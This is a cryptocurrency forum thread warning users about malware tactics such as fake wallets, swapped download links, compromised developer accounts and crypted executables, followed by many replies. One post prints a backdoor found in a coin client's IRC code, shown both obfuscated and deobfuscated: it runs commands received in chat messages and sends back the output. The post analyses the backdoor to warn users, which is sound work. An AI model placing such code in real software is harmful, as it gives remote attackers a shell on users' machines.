Beware of Increasingly Sophisticated Malware Infection Attempts

[domoy77]

thank you very helpful, more alert for old threads that have been updated by irresponsible parties, will use various ways to rob.

[RolandoBTC]

Eversince the computer invented the virus are also born at that time, now the sophisticated malware infection are getting increasingly affected to our software in computer to minimize them we must put anti virus in our computer system..

[Mezounbanned]

There are always malwares everywhere this is digital life. There is also hardware vulnerabilities in all our processors as was recently revealed. I forgot the name, but basically anyone can be hacked.

[Kolapi]

This is terrifying.. . Individuals who have the ability and aptitudes utilizes it in most unsuitable way. On the off chance that lone they utilize it to improve things or help other individuals, the world would be lovely. I figure that is the thing that truly life is. A debt of gratitude is in order for this data. Expectation everybody will know about this

[Opurum]

Besides new wallets and scam ICOs, bounty hunters and airdrop chasers should check very carefully before participating in such campaigns. Scammers are now more than ever using airdrops as baits for hacking and phishing. Please avoid any airdrop that gives direct link to your MEW or other wallet account. You may end up on a scam wallet site.

[batrocio1]

Im  a newbie here, thank you for your advice, hope all newbie can read this, and for those people who just clicking without even reading what pop ups real intention , maybe some pop ups are just full of virus that can corrupt their file. be safe everyone and be cautions. thank you

[diego ramos]

This is one of the most terrifying thing. I am super careful but they are getting stronger each day.

[Ethan101]

One of the best ways to prevent malware infecting your devices is to have a machine dedicated for crypto mining/trading. This will allow you to separate your normal activities on the internet and your cryptocurrency related activities. This reduces the chance of malware infecting your machine and hackers stealing personal data.

To prevent malicious attempts to utilise your machine's processing power for mining it is recommended that you follow general online security advice. Do not go on to suspicious websites, regularly update your anti-virus software and activate two factor authentication to prevent anyone else from accessing your accounts on online exchanges.

[vandan.mishra2]

In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Malwares or spywares are most common problems ,make sure that you are using an encrypted protections on device.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:

Code:

if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
	CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
	if (buf) {
		std::string result = "";
		while (!feof(buf))
			if (fgets(pszName, sizeof(pszName), buf) != NULL)
				result += pszName;
		CFree(buf);
		strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
		if (strchr(pszName, '!'))
			*strchr(pszName, '!') = '\0';
		Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
	}
}

here is the source code with macros resolved:

Code:

if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
	FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
	if (buf) {
		std::string result = "";
		while (!feof(buf))
			if (fgets(pszName, sizeof(pszName), buf) != NULL)
				result += pszName;
		pclose(buf);
		strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
		if (strchr(pszName, '!'))
			*strchr(pszName, '!') = '\0';
		Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
	}
}

The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.

[gemnuryu]

These con artists are always picking up, getting to be more intelligent and more complex. Be cautious dependably. Download just from official locales and dependably check where the connection drives you will go.

[Wadolg]

Much appreciated this was exceptionally useful. Malware contamination attemps is turning into an everyone issue. Programmers are winding up more risky and we additionally require focus on airdrop or giveaway. Numerous individuals will in any case lose their cash in next years....so data, similar to your post, is valuable. Much thanks to you.

[CityLife Corp.]

what's the coin name ?

[roverboi]

Some steps must be taken which are good enough to protect your systems to be hacked such as not to use unknown exe, use of linux which seems to be less vunarable to virus.

[skisport92]

damn, a lot of things. what do you think about DNS services? anti-viruses also solve the problem of hacking. I do save all passwords on flash drive to the computer nothing happened

[TheLoser]

Besides new wallets and scam ICOs, bounty hunters and airdrop chasers should check very carefully before participating in such campaigns. Scammers are now more than ever using airdrops as baits for hacking and phishing. Please avoid any airdrop that gives direct link to your MEW or other wallet account. You may end up on a scam wallet site.

Yes you are right, scammers are increasingly sophisticated and in recent times there have been a lot of cases of infection through airdrops , it is necessary to be very attentive and careful.

[Terra_Anon]

Besides new wallets and scam ICOs, bounty hunters and airdrop chasers should check very carefully before participating in such campaigns. Scammers are now more than ever using airdrops as baits for hacking and phishing. Please avoid any airdrop that gives direct link to your MEW or other wallet account. You may end up on a scam wallet site.

Yes you are right, scammers are increasingly sophisticated and in recent times there have been a lot of cases of infection through airdrops , it is necessary to be very attentive and careful.

This Hooligans know nothing but to steal from others. They are creative enough to create such innovation just to get other people's coins. why can't they just direct this enthusiasm into good use? Really appreciate the warning and tips from this post.

[caballero12]

Besides new wallets and scam ICOs, bounty hunters and airdrop chasers should check very carefully before participating in such campaigns. Scammers are now more than ever using airdrops as baits for hacking and phishing. Please avoid any airdrop that gives direct link to your MEW or other wallet account. You may end up on a scam wallet site.

Yes you are right, scammers are increasingly sophisticated and in recent times there have been a lot of cases of infection through airdrops , it is necessary to be very attentive and careful.

This Hooligans know nothing but to steal from others. They are creative enough to create such innovation just to get other people's coins. why can't they just direct this enthusiasm into good use? Really appreciate the warning and tips from this post.

I personally experienced this with one of my MEW wallets. I was doing and airdrop and little did I know that my cons are being transferred 1 by 1. I lost about $800 worth of coins from that wallet and potentially more.

[Bitalkcoin$]

Thanks for sharing this info! It's always good practice to keep ourselves abreast of the various new stuff on cybersecurity.

[Lumiisay]

After suffering an attack once, I've been very cautious of clicking on most malicious links I come across. Once bitten, twice shy they say 

[FilesFM_Team]

Thanks for posting this, great to be aware of some of the risks out there.